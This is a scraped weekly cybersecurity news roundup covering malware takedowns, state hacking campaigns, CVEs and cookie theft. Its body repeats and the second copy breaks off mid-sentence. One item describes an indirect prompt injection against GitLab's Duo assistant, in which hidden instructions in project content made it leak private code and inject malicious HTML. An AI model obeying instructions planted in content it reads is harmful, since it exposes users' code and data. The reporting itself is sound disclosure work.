    Cyber threats don't show up one at a time anymore. They're layered, planned, and often stay hidden until it's too late. For cybersecurity teams, the key isn't just reacting to alerts—it's spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today's complex systems, we need focused analysis—not noise. What you'll see here isn't just a list of incidents, but a clear look at where control is being gained, lost, or quietly tested. ⚡ Threat of the Week Lumma Stealer, DanaBot Operations Disrupted — A coalition of private sector companies and law enforcement agencies have taken down the infrastructure associated with Lumma Stealer and DanaBot. Charges have also been unsealed against 16 individuals for their alleged involvement in the development and deployment of DanaBot. The malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information. More uniquely, though, DanaBot has also been used for hacking campaigns that appear to be linked to Russian state-sponsored interests. All of that makes DanaBot a particularly clear example of how commodity malware has been repurposed by Russian state hackers for their own goals. In tandem, about 2,300 domains that acted as the command-and-controlbackbone for the Lumma information stealer have been seized, alongside taking down 300 servers and neutralizing 650 domains that were used to launch ransomware attacks. The actions against international cybercrime in the past few days constituted the latest phase of Operation Endgame. Get the Guide ➝ 🔔 Top News Threat Actors Use TikTok Videos to Distribute Stealers — While ClickFix has become a popular social engineering tactic to deliver malware, threat actors have been observed using artificial intelligence-generated videos uploaded to TikTok to deceive users into running malicious commands on their systems and deploy malware like Vidar and StealC under the guise of activating pirated version of Windows, Microsoft Office, CapCut, and Spotify. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware," Trend Micro said. APT28 Hackers Target Western Logistics and Tech Firms — Several cybersecurity and intelligence agencies from Australia, Europe, and the United States issued a joint alert warning of a state-sponsored campaign orchestrated by the Russian state-sponsored threat actor APT28 targeting Western logistics entities and technology companies since 2022. "This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide scale targeting of IP cameras in Ukraine and bordering NATO nations," the agencies said. The attacks are designed to steal sensitive information and maintain long-term persistence on compromised hosts. Chinese Threat Actors Exploit Ivanti EPMM Flaws — The China-nexus cyber espionage group tracked as UNC5221 has been attributed to the exploitation of a pair of security flaws affecting Ivanti Endpoint Manager Mobilesoftwareto target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The intrusions leverage the vulnerabilities to obtain a reverse shell and drop malicious payloads like KrustyLoader, which is known to deliver the Sliver command-and-controlframework. "UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components for covert data exfiltration," EclecticIQ said. "Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization." Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code. Links to these browser add-ons are hosted on specially crafted sites to which users are likely redirected to via phishing and social media posts. While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Several of these extensions have been taken down by Google. CISA Warns of SaaS Providers of Attacks Targeting Cloud Environments — The U.S. Cybersecurity and Infrastructure Security Agencywarned that SaaS companies are under threat from bad actors who are on the prowl for cloud applications with default configurations and elevated permissions. While the agency did not attribute the activity to a specific group, the advisory said enterprise backup platform Commvault is monitoring cyber threat activity targeting applications hosted in their Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault'sMicrosoft 365backup software-as-a-servicesolution, hosted in Azure," CISA said. "This provided the threat actors with unauthorized access to Commvault's customers' M365 environments that have application secrets stored by Commvault." GitLab AI Coding Assistant Flaws Could Be Used to Inject Malicious Code — Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligenceassistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. The attack could also leak confidential issue data, such as zero-day vulnerability details. All that's required is for the attacker to instruct the chatbot to interact with a merge requestby taking advantage of the fact that GitLab Duo has extensive access to the platform. "By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo's behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes," Legit Security said. One variation of the attack involved hiding a malicious instruction in an otherwise legitimate piece of source code, while another exploited Duo's parsing of markdown responses in real-time asynchronously. An attacker could leverage this behavior – that Duo begins rendering the output line by line rather than waiting until the entire response is generated and sending it all at once – to introduce malicious HTML code that can access sensitive data and exfiltrate the information to a remote server. The issues have been patched by GitLab following responsible disclosure. ‎️‍🔥 Trending CVEs Software vulnerabilities remain one of the simplest—and most effective—entry points for attackers. Each week uncovers new flaws, and even small delays in patching can escalate into serious security incidents. Staying ahead means acting fast. Below is this week's list of high-risk vulnerabilities that demand attention. Review them carefully, apply updates without delay, and close the doors before they're forced open. This week's list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027, CVE-2025-30911, CVE-2024-57273, CVE-2024-54780, and CVE-2024-54779, CVE-2025-41229, CVE-2025-4322, CVE-2025-47934, CVE-2025-30193, CVE-2025-0993, CVE-2025-36535, CVE-2025-47949, CVE-2025-40775, CVE-2025-20152, CVE-2025-4123, CVE-2025-5063, CVE-2025-37899, CVE-2025-26817, CVE-2025-47947, CVE-2025-3078, CVE-2025-3079, and CVE-2025-4978. 📰 Around the Cyber World Sandworm Drops New Wiper in Ukraine — The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. "The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it deployed the ZEROLOT wiper in Ukraine. For this, the attackers abused Active Directory Group Policy in the affected organizations," ESET Director of Threat Research, Jean-Ian Boutin, said. Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox. Signal Says No to Recall — Signal has released a new version of its messaging app for Windows that, by default, blocks the ability of Windows to use Recall to periodically take screenshots of the app. "Although Microsoft made several adjustments over the past twelve months in response to critical feedback, the revamped version of Recall still places any content that's displayed within privacy-preserving apps like Signal at risk," Signal said. "As a result, we are enabling an extra layer of protection by default on Windows 11 in order to help maintain the security of Signal Desktop on that platform even though it introduces some usability trade-offs. Microsoft has simply given us no other option." Microsoft began officially rolling out Recall last month. Russia Introduces New Law to Track Foreigners Using Their Smartphones — The Russian government has introduced a new law that makes installing a tracking app mandatory for all foreign nationals in the Moscow region. This includes gathering their real-time locations, fingerprint, face photograph, and residential information. "The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said. "If migrants change their actual place of residence, they will be required to inform the Ministry of Internal Affairswithin three working days." A proposed four-year trial period begins on September 1, 2025, and runs until September 1, 2029. Dutch Government Passes Law to Criminalize Cyber Espionage — The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies. Under the amended law, leaking sensitive information that is not classified as a state secret or engaging in activities on behalf of a foreign government that harm Dutch interests can also result in criminal charges. "Foreign governments are also interested in non-state-secret, sensitive information about a particular economic sector or about political decision-making," the government said. "Such information can be used to influence political processes, weaken the Dutch economy or play allies against each other. Espionage can also involve actions other than sharing information." Microsoft Announces Availability of Quantum-Resistant Algorithms to SymCrypt — Microsoft has revealed that it's making post-quantum cryptographycapabilities, including ML-KEM and ML-DSA, available for Windows Insiders, Canary Channel Build 27852 and higher, and Linux, SymCrypt-OpenSSL version 1.9.0. "This advancement will enable customers to commence their exploration and experimentation of PQC within their operational environments," Microsoft said. "By obtaining early access to PQC capabilities, organizations can proactively assess the compatibility, performance, and integration of these novel algorithms alongside their existing security infrastructure." New Malware DOUBLELOADER Uses ALCATRAZ for Obfuscation — The open-source obfuscator ALCATRAZ has been seen within a new generic loader dubbed DOUBLELOADER, which has been deployed alongside Rhadamanthys Stealer infections starting December 2024. The malware collects host information, requests an updated version of itself, and starts beaconing to a hardcoded IP addressstored within the binary. "Obfuscators such as ALCATRAZ end up increasing the complexity when triaging malware," Elastic Security Labs said. "Its main goal is to hinder binary analysis tools and increase the time of the reverse engineering process through different techniques; such as hiding the control flow or making decompilation hard to follow." New Formjacking Campaign Targets WooCommerce Sites — Cybersecurity researchers have detected a sophisticated formjacking campaign targeting WooCommerce sites. The malware, per Wordfence, injects a fake but professional-looking payment form into legitimate checkout processes and exfiltrates sensitive customer data to an external server. Further analysis has revealed that the infection likely originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via a Simple Custom CSS and JS pluginthat allows administrators to add custom code. "Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site's design and payment workflow, making it particularly difficult for site owners and users to detect," the WordPress security company said. "The malware author repurposed the browser's localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page." E.U. Sanctions Stark Industries — The European Unionhas announced sanctions against 21 individuals and six entities in Russia over its "destabilising actions" in the region. One of the sanctioned entities is Stark Industries, a bulletproof hosting provider that has been accused of acting as "enablers of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber attacks against the Union and third countries." The sanctions also target its CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries was previously spotlighted by independent cybersecurity journalist Brian Krebs, detailing its use in DDoS attacks in Ukraine and across Europe. In August 2024, Team Cymru said it discovered 25 Stark-assigned IP addresses used to host domains associated with FIN7 activities and that it had been working with Stark Industries for several months to identify and reduce abuse of their systems. The sanctions have also targeted Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming in Baltic states and disrupting civil aviation. The Mask APT Unmasked as Tied to the Spanish Government — The mysterious threat actor known as The Maskhas been identified as run by the Spanish government, according to a report published by TechCrunch, citing people who worked at Kaspersky at the time and had knowledge of the investigation. The Russian cybersecurity company first exposed the hacking group in 2014, linking it to highly sophisticated attacks since at least 2007 targeting high-profile organizations, such as governments, diplomatic entities, and research institutions. A majority of the group's attacks have targeted Cuba, followed by hundreds of victims in Brazil, Morocco, Spain, and Gibraltar. While Kaspersky has not publicly attributed it to a specific country, the latest revelation makes The Mask one of the few Western government hacking groups that has ever been discussed in public. This includes the Equation Group, the Lamberts, and Animal Farm. Social Engineering Scams Target Coinbase Users — Earlier this month, cryptocurrency exchange Coinbase revealed that it was the victim of a malicious attack perpetrated by unknown threat actors to breach its systems by bribing customer support agents in India and siphon funds from nearly 70,000 customers. According to Blockchain security firm SlowMist, Coinbase users have been the target of social engineering scams since the start of the year, bombarding with SMS messages claiming to be fake withdrawal requests and seeking their confirmation as part of a "sustained and organized scam campaign." The goal is to induce a false sense of urgency and trick them into calling a number, eventually convincing them to transfer the funds to a secure wallet with a seed phrase pre-generated by the attackers and ultimately drain the assets. It's assessed that the activities are primarily carried out by two groups: low-level skid attackers from the Com community and organized cybercrime groups based in India. "Using spoofed PBX phone systems, scammers impersonate Coinbase support and claim there's been 'unauthorized access' or 'suspicious withdrawals' on the user's account," SlowMist said. "They create a sense of urgency, then follow up with phishing emails or texts containing fake ticket numbers or 'recovery links.'" Delta Can Sue CrowdStrike Over July 2024 Mega Outage — Delta Air Lines, which had its systems crippled and almost 7,000 flights canceled in the wake of a massive outage caused by a faulty update issued by CrowdStrike in mid-July 2024, has been given the green light to pursue to its lawsuit against the cybersecurity company. A judge in the U.S. state of Georgia stating Delta can try to prove that CrowdStrike was grossly negligent by pushing a defective update to its Falcon software to customers. The update crashed 8.5 million Windows devices across the world. Crowdstrike previously claimed that the airline had rejected technical support offers both from itself and Microsoft. In a statement shared with Reuters, lawyers representing CrowdStrike said they were "confident the judge will find Delta's case has no merit, or will limit damages to the 'single-digit millions of dollars' under Georgia law." The development comes months after MGM Resorts International agreed to pay million to settle multiple class-action lawsuits related to a data breach in 2019 and a ransomware attack the company experienced in 2023. Storm-1516 Uses AI-Generated Media to Spread Disinformation — The Russian influence operation known as Storm-1516sought to spread narratives that undermined the European support for Ukraine by amplifying fabricated stories on X about European leaders using drugs while traveling by train to Kyiv for peace talks. One of the posts was subsequently shared by Russian state media and Maria Zakharova, a senior official in Russia's foreign ministry, as part of what has been described as a coordinated disinformation campaign by EclecticIQ. The activity is also notable for the use of synthetic content depicting French President Emmanuel Macron, U.K. Labour Party leader Keir Starmer, and German chancellor Friedrich Merz of drug possession during their return from Ukraine. "By attacking the reputation of these leaders, the campaign likely aimed to turn their own voters against them, using influence operationsto reduce public support for Ukraine by discrediting the politicians who back it," the Dutch threat intelligence firm said. Turkish Users Targeted by DBatLoader — AhnLab has disclosed details of a malware campaign that's distributing a malware loader called DBatLoadervia banking-themed banking emails, which then acts as a conduit to deliver SnakeKeylogger, an information stealer developed in .NET. "The DBatLoader malware distributed through phishing emails has the cunning behavior of exploiting normal processesthrough techniques such as DLL side-loading and injection for most of its behaviors, and it also utilizes normal processesfor behaviors such as file copying and changing policies," the company said. SEC SIM-Swapper Sentenced to 14 Months for SEC X Account Hack — A 26-year-old Alabama man, Eric Council Jr., has been sentenced to 14 months in prison and three years of supervised release for using SIM swapping attacks to breach the U.S. Securities and Exchange Commission'sofficial X account in January 2024 and falsely announced that the SEC approved BitcoinExchange Traded Funds. Council Jr.was arrested in October 2024 and pleaded guilty to the crime earlier this February. He has also been ordered to forfeit According to court documents, Council used his personal computer to search incriminating phrases such as "SECGOV hack," "telegram sim swap," "how can I know for sure if I am being investigated by the FBI," "What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them," "what are some signs that the FBI is after you," "Verizon store list," "federal identity theft statute," and "how long does it take to delete telegram account." FBI Warns of Malicious Campaign Impersonating Government Officials — The U.S. Federal Bureau of Investigationis warning of a new campaign that involves malicious actors impersonating senior U.S. federal or state government officials and their contacts to target individuals since April 2025. "The malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior US official in an effort to establish rapport before gaining access to personal accounts," the FBI said. "One way the actors gain such access is by sending targeted individuals a malicious link under the guise of transitioning to a separate messaging platform." From there, the actor may present malware or introduce hyperlinks that lead intended targets to an actor-controlled site that steals login information. DICOM Flaw Enables Attackers to Embed Malicious Code Within Medical Image Files — Praetorian has released a proof-of-conceptfor a high-severity security flaw in Digital Imaging and Communications in Medicine, predominant file format for medical images, that enables attackers to embed malicious code within legitimate medical image files. CVE-2019-11687, originally disclosed in 2019 by Markel Picado Ortiz, stems from a design decision that allows arbitrary content at the start of the file, otherwise called the Preamble, which enables the creation of malicious polyglots. Codenamed ELFDICOM, the PoC extends the attack surface to Linux environments, making it a much more potent threat. As mitigations, it's advised to implement a DICOM preamble whitelist. "DICOM's file structure inherently allows arbitrary bytes at the beginning of the file, where Linux and most operating systems will look for magic bytes," Praetorian researcher Ryan Hennessee said. "would check a DICOM file's preamble before it is imported into the system. This would allow known good patterns, such as 'TIFF' magic bytes, or '\x00' null bytes, while files with the ELF magic bytes would be blocked." Cookie-Bite Attack Uses Chrome Extension to Steal Session Tokens — Cybersecurity researchers have demonstrated a new attack technique called Cookie-Bite that employs custom-made malicious browser extensions to steal "ESTAUTH" and "ESTSAUTHPERSISTNT" cookies in Microsoft Azure Entra ID and bypass multi-factor authentication. The attack has multiple moving parts to it: A custom Chrome extension that monitors authentication events and captures cookies; a PowerShell script that automates the extension deployment and ensures persistence; an exfiltration mechanism to send the cookies to a remote collection point; and a complementary extension to inject the captured cookies into the attacker's browser. "Threat actors often use infostealers to extract authentication tokens directly from a victim's machine or buy them directly through darkness markets, allowing adversaries to hijack active cloud sessions without triggering MFA," Varonis said. "By injecting these cookies while mimicking the victim's OS, browser, and network, attackers can evade Conditional Access Policiesand maintain persistent access." Authentication cookies can also be stolen using adversary-in-the-middlephishing kits in real-time, or using rogue browser extensions that request excessive permissions to interact with web sessions, modify page content, and extract stored authentication data. Once installed, the extension can access the browser's storage API, intercept network requests, or inject malicious JavaScript into active sessions to harvest real-time session cookies. "By leveraging stolen session cookies, an adversary can bypass authentication mechanisms, gaining seamless entry into cloud environments without requiring user credentials," Varonis said. "Beyond initial access, session hijacking can facilitate lateral movement across the tenant, allowing attackers to explore additional resources, access sensitive data, and escalate privileges by abusing existing permissions or misconfigured roles." 🎥 Cybersecurity Webinars Non-Human Identities: The AI Backdoor You're Not Watching → AI agents rely on Non-Human Identitiesto function—but these are often left untracked and unsecured. As attackers shift focus to this hidden layer, the risk is growing fast. In this session, you'll learn how to find, secure, and monitor these identities before they're exploited. Join the webinar to understand the real risks behind AI adoption—and how to stay ahead. Inside the LOTS Playbook: How Hackers Stay Undetected → Attackers are using trusted sites to stay hidden. In this webinar, Zscaler experts share how they detect these stealthy LOTS attacks using insights from the world's largest security cloud. Join to learn how to spot hidden threats and improve your defense. 🔧 Cybersecurity Tools ScriptSentry → It is a free tool that scans your environment for dangerous logon script misconfigurations—like plaintext credentials, insecure file/share permissions, and references to non-existent servers. These overlooked issues can enable lateral movement, privilege escalation, or even credential theft. ScriptSentry helps you quickly identify and fix them across large Active Directory environments. Aftermath → It is a Swift-based, open-source tool for macOS incident response. It collects forensic data—like logs, browser activity, and process info—from compromised systems, then analyzes it to build timelines and track infection paths. Deploy via MDM or run manually. Fast, lightweight, and ideal for post-incident investigation. AI Red Teaming Playground Labs → It is an open-source training suite with hands-on challenges designed to teach security professionals how to red team AI systems. Originally developed for Black Hat USA 2024, the labs cover prompt injections, safety bypasses, indirect attacks, and Responsible AI failures. Built on Chat Copilot and deployable via Docker, it's a practical resource for testing and understanding real-world AI vulnerabilities. 🔒 Tip of the Week Review and Revoke Old OAuth App Permissions — They're Silent Backdoor → You've likely logged into apps using "Continue with Google," "Sign in with Microsoft," or GitHub/Twitter/Facebook logins. That's OAuth. But did you know many of those apps still have access to your data long after you stop using them? Why it matters: Even if you delete the app or forget it existed, it might still have ongoing access to your calendar, email, cloud files, or contact list — no password needed. If that third-party gets breached, your data is at risk. What to do: Go through your connected apps here: Google: myaccount.google.com/permissions Microsoft: account.live.com/consent/Manage GitHub: github.com/settings/applications Facebook: facebook.com/settings?tab=applications Revoke anything you don't actively use. It's a fast, silent cleanup — and it closes doors you didn't know were open. Conclusion Looking ahead, it's not just about tracking threats—it's about understanding what they reveal. Every tactic used, every system tested, points to deeper issues in how trust, access, and visibility are managed. As attackers adapt quickly, defenders need sharper awareness and faster response loops. The takeaways from this week aren't just technical—they speak to how teams prioritize risk, design safeguards, and make choices under pressure. Use these insights not just to react, but to rethink what "secure" really needs to mean in today's environment. Found this article interesting? Follow us on Twitter  and LinkedIn to read more exclusive content we post. #weekly #recap #apt #campaigns #browser
    THEHACKERNEWS.COM
    ⚡ Weekly Recap: APT Campaigns, Browser Hijacks, AI Malware, Cloud Breaches and Critical CVEs
    Cyber threats don't show up one at a time anymore. They're layered, planned, and often stay hidden until it's too late. For cybersecurity teams, the key isn't just reacting to alerts—it's spotting early signs of trouble before they become real threats. This update is designed to deliver clear, accurate insights based on real patterns and changes we can verify. With today's complex systems, we need focused analysis—not noise. What you'll see here isn't just a list of incidents, but a clear look at where control is being gained, lost, or quietly tested. ⚡ Threat of the Week Lumma Stealer, DanaBot Operations Disrupted — A coalition of private sector companies and law enforcement agencies have taken down the infrastructure associated with Lumma Stealer and DanaBot. Charges have also been unsealed against 16 individuals for their alleged involvement in the development and deployment of DanaBot. The malware is equipped to siphon data from victim computers, hijack banking sessions, and steal device information. More uniquely, though, DanaBot has also been used for hacking campaigns that appear to be linked to Russian state-sponsored interests. All of that makes DanaBot a particularly clear example of how commodity malware has been repurposed by Russian state hackers for their own goals. In tandem, about 2,300 domains that acted as the command-and-control (C2) backbone for the Lumma information stealer have been seized, alongside taking down 300 servers and neutralizing 650 domains that were used to launch ransomware attacks. The actions against international cybercrime in the past few days constituted the latest phase of Operation Endgame. Get the Guide ➝ 🔔 Top News Threat Actors Use TikTok Videos to Distribute Stealers — While ClickFix has become a popular social engineering tactic to deliver malware, threat actors have been observed using artificial intelligence (AI)-generated videos uploaded to TikTok to deceive users into running malicious commands on their systems and deploy malware like Vidar and StealC under the guise of activating pirated version of Windows, Microsoft Office, CapCut, and Spotify. "This campaign highlights how attackers are ready to weaponize whichever social media platforms are currently popular to distribute malware," Trend Micro said. APT28 Hackers Target Western Logistics and Tech Firms — Several cybersecurity and intelligence agencies from Australia, Europe, and the United States issued a joint alert warning of a state-sponsored campaign orchestrated by the Russian state-sponsored threat actor APT28 targeting Western logistics entities and technology companies since 2022. "This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors' wide scale targeting of IP cameras in Ukraine and bordering NATO nations," the agencies said. The attacks are designed to steal sensitive information and maintain long-term persistence on compromised hosts. Chinese Threat Actors Exploit Ivanti EPMM Flaws — The China-nexus cyber espionage group tracked as UNC5221 has been attributed to the exploitation of a pair of security flaws affecting Ivanti Endpoint Manager Mobile (EPMM) software (CVE-2025-4427 and CVE-2025-4428) to target a wide range of sectors across Europe, North America, and the Asia-Pacific region. The intrusions leverage the vulnerabilities to obtain a reverse shell and drop malicious payloads like KrustyLoader, which is known to deliver the Sliver command-and-control (C2) framework. "UNC5221 demonstrates a deep understanding of EPMM's internal architecture, repurposing legitimate system components for covert data exfiltration," EclecticIQ said. "Given EPMM's role in managing and pushing configurations to enterprise mobile devices, a successful exploitation could allow threat actors to remotely access, manipulate, or compromise thousands of managed devices across an organization." Over 100 Google Chrome Extensions Mimic Popular Tools — An unknown threat actor has been attributed to creating several malicious Chrome Browser extensions since February 2024 that masquerade as seemingly benign utilities such as DeepSeek, Manus, DeBank, FortiVPN, and Site Stats but incorporate covert functionality to exfiltrate data, receive commands, and execute arbitrary code. Links to these browser add-ons are hosted on specially crafted sites to which users are likely redirected to via phishing and social media posts. While the extensions appear to offer the advertised features, they also stealthily facilitate credential and cookie theft, session hijacking, ad injection, malicious redirects, traffic manipulation, and phishing via DOM manipulation. Several of these extensions have been taken down by Google. CISA Warns of SaaS Providers of Attacks Targeting Cloud Environments — The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned that SaaS companies are under threat from bad actors who are on the prowl for cloud applications with default configurations and elevated permissions. While the agency did not attribute the activity to a specific group, the advisory said enterprise backup platform Commvault is monitoring cyber threat activity targeting applications hosted in their Microsoft Azure cloud environment. "Threat actors may have accessed client secrets for Commvault's (Metallic) Microsoft 365 (M365) backup software-as-a-service (SaaS) solution, hosted in Azure," CISA said. "This provided the threat actors with unauthorized access to Commvault's customers' M365 environments that have application secrets stored by Commvault." GitLab AI Coding Assistant Flaws Could Be Used to Inject Malicious Code — Cybersecurity researchers have discovered an indirect prompt injection flaw in GitLab's artificial intelligence (AI) assistant Duo that could have allowed attackers to steal source code and inject untrusted HTML into its responses, which could then be used to direct victims to malicious websites. The attack could also leak confidential issue data, such as zero-day vulnerability details. All that's required is for the attacker to instruct the chatbot to interact with a merge request (or commit, issue, or source code) by taking advantage of the fact that GitLab Duo has extensive access to the platform. "By embedding hidden instructions in seemingly harmless project content, we were able to manipulate Duo's behavior, exfiltrate private source code, and demonstrate how AI responses can be leveraged for unintended and harmful outcomes," Legit Security said. One variation of the attack involved hiding a malicious instruction in an otherwise legitimate piece of source code, while another exploited Duo's parsing of markdown responses in real-time asynchronously. An attacker could leverage this behavior – that Duo begins rendering the output line by line rather than waiting until the entire response is generated and sending it all at once – to introduce malicious HTML code that can access sensitive data and exfiltrate the information to a remote server. The issues have been patched by GitLab following responsible disclosure. ‎️‍🔥 Trending CVEs Software vulnerabilities remain one of the simplest—and most effective—entry points for attackers. Each week uncovers new flaws, and even small delays in patching can escalate into serious security incidents. Staying ahead means acting fast. Below is this week's list of high-risk vulnerabilities that demand attention. Review them carefully, apply updates without delay, and close the doors before they're forced open. This week's list includes — CVE-2025-34025, CVE-2025-34026, CVE-2025-34027 (Versa Concerto), CVE-2025-30911 (RomethemeKit For Elementor WordPress plugin), CVE-2024-57273, CVE-2024-54780, and CVE-2024-54779 (pfSense), CVE-2025-41229 (VMware Cloud Foundation), CVE-2025-4322 (Motors WordPress theme), CVE-2025-47934 (OpenPGP.js), CVE-2025-30193 (PowerDNS), CVE-2025-0993 (GitLab), CVE-2025-36535 (AutomationDirect MB-Gateway), CVE-2025-47949 (Samlify), CVE-2025-40775 (BIND DNS), CVE-2025-20152 (Cisco Identity Services Engine), CVE-2025-4123 (Grafana), CVE-2025-5063 (Google Chrome), CVE-2025-37899 (Linux Kernel), CVE-2025-26817 (Netwrix Password Secure), CVE-2025-47947 (ModSecurity), CVE-2025-3078, CVE-2025-3079 (Canon Printers), and CVE-2025-4978 (NETGEAR). 📰 Around the Cyber World Sandworm Drops New Wiper in Ukraine — The Russia-aligned Sandworm group intensified destructive operations against Ukrainian energy companies, deploying a new wiper named ZEROLOT. "The infamous Sandworm group concentrated heavily on compromising Ukrainian energy infrastructure. In recent cases, it deployed the ZEROLOT wiper in Ukraine. For this, the attackers abused Active Directory Group Policy in the affected organizations," ESET Director of Threat Research, Jean-Ian Boutin, said. Another Russian hacking group, Gamaredon, remained the most prolific actor targeting the East European nation, enhancing malware obfuscation and introducing PteroBox, a file stealer leveraging Dropbox. Signal Says No to Recall — Signal has released a new version of its messaging app for Windows that, by default, blocks the ability of Windows to use Recall to periodically take screenshots of the app. "Although Microsoft made several adjustments over the past twelve months in response to critical feedback, the revamped version of Recall still places any content that's displayed within privacy-preserving apps like Signal at risk," Signal said. "As a result, we are enabling an extra layer of protection by default on Windows 11 in order to help maintain the security of Signal Desktop on that platform even though it introduces some usability trade-offs. Microsoft has simply given us no other option." Microsoft began officially rolling out Recall last month. Russia Introduces New Law to Track Foreigners Using Their Smartphones — The Russian government has introduced a new law that makes installing a tracking app mandatory for all foreign nationals in the Moscow region. This includes gathering their real-time locations, fingerprint, face photograph, and residential information. "The adopted mechanism will allow, using modern technologies, to strengthen control in the field of migration and will also contribute to reducing the number of violations and crimes in this area," Vyacheslav Volodin, chairman of the State Duma, said. "If migrants change their actual place of residence, they will be required to inform the Ministry of Internal Affairs (MVD) within three working days." A proposed four-year trial period begins on September 1, 2025, and runs until September 1, 2029. Dutch Government Passes Law to Criminalize Cyber Espionage — The Dutch government has approved a law criminalizing a wide range of espionage activities, including digital espionage, in an effort to protect national security, critical infrastructure, and high-quality technologies. Under the amended law, leaking sensitive information that is not classified as a state secret or engaging in activities on behalf of a foreign government that harm Dutch interests can also result in criminal charges. "Foreign governments are also interested in non-state-secret, sensitive information about a particular economic sector or about political decision-making," the government said. "Such information can be used to influence political processes, weaken the Dutch economy or play allies against each other. Espionage can also involve actions other than sharing information." Microsoft Announces Availability of Quantum-Resistant Algorithms to SymCrypt — Microsoft has revealed that it's making post-quantum cryptography (PQC) capabilities, including ML-KEM and ML-DSA, available for Windows Insiders, Canary Channel Build 27852 and higher, and Linux, SymCrypt-OpenSSL version 1.9.0. "This advancement will enable customers to commence their exploration and experimentation of PQC within their operational environments," Microsoft said. "By obtaining early access to PQC capabilities, organizations can proactively assess the compatibility, performance, and integration of these novel algorithms alongside their existing security infrastructure." New Malware DOUBLELOADER Uses ALCATRAZ for Obfuscation — The open-source obfuscator ALCATRAZ has been seen within a new generic loader dubbed DOUBLELOADER, which has been deployed alongside Rhadamanthys Stealer infections starting December 2024. The malware collects host information, requests an updated version of itself, and starts beaconing to a hardcoded IP address (185.147.125[.]81) stored within the binary. "Obfuscators such as ALCATRAZ end up increasing the complexity when triaging malware," Elastic Security Labs said. "Its main goal is to hinder binary analysis tools and increase the time of the reverse engineering process through different techniques; such as hiding the control flow or making decompilation hard to follow." New Formjacking Campaign Targets WooCommerce Sites — Cybersecurity researchers have detected a sophisticated formjacking campaign targeting WooCommerce sites. The malware, per Wordfence, injects a fake but professional-looking payment form into legitimate checkout processes and exfiltrates sensitive customer data to an external server. Further analysis has revealed that the infection likely originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via a Simple Custom CSS and JS plugin (or something similar) that allows administrators to add custom code. "Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site's design and payment workflow, making it particularly difficult for site owners and users to detect," the WordPress security company said. "The malware author repurposed the browser's localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page." E.U. Sanctions Stark Industries — The European Union (E.U.) has announced sanctions against 21 individuals and six entities in Russia over its "destabilising actions" in the region. One of the sanctioned entities is Stark Industries, a bulletproof hosting provider that has been accused of acting as "enablers of various Russian state-sponsored and affiliated actors to conduct destabilising activities including, information manipulation interference and cyber attacks against the Union and third countries." The sanctions also target its CEO Iurie Neculiti and owner Ivan Neculiti. Stark Industries was previously spotlighted by independent cybersecurity journalist Brian Krebs, detailing its use in DDoS attacks in Ukraine and across Europe. In August 2024, Team Cymru said it discovered 25 Stark-assigned IP addresses used to host domains associated with FIN7 activities and that it had been working with Stark Industries for several months to identify and reduce abuse of their systems. The sanctions have also targeted Kremlin-backed manufacturers of drones and radio communication equipment used by the Russian military, as well as those involved in GPS signal jamming in Baltic states and disrupting civil aviation. The Mask APT Unmasked as Tied to the Spanish Government — The mysterious threat actor known as The Mask (aka Careto) has been identified as run by the Spanish government, according to a report published by TechCrunch, citing people who worked at Kaspersky at the time and had knowledge of the investigation. The Russian cybersecurity company first exposed the hacking group in 2014, linking it to highly sophisticated attacks since at least 2007 targeting high-profile organizations, such as governments, diplomatic entities, and research institutions. A majority of the group's attacks have targeted Cuba, followed by hundreds of victims in Brazil, Morocco, Spain, and Gibraltar. While Kaspersky has not publicly attributed it to a specific country, the latest revelation makes The Mask one of the few Western government hacking groups that has ever been discussed in public. This includes the Equation Group, the Lamberts (the U.S.), and Animal Farm (France). Social Engineering Scams Target Coinbase Users — Earlier this month, 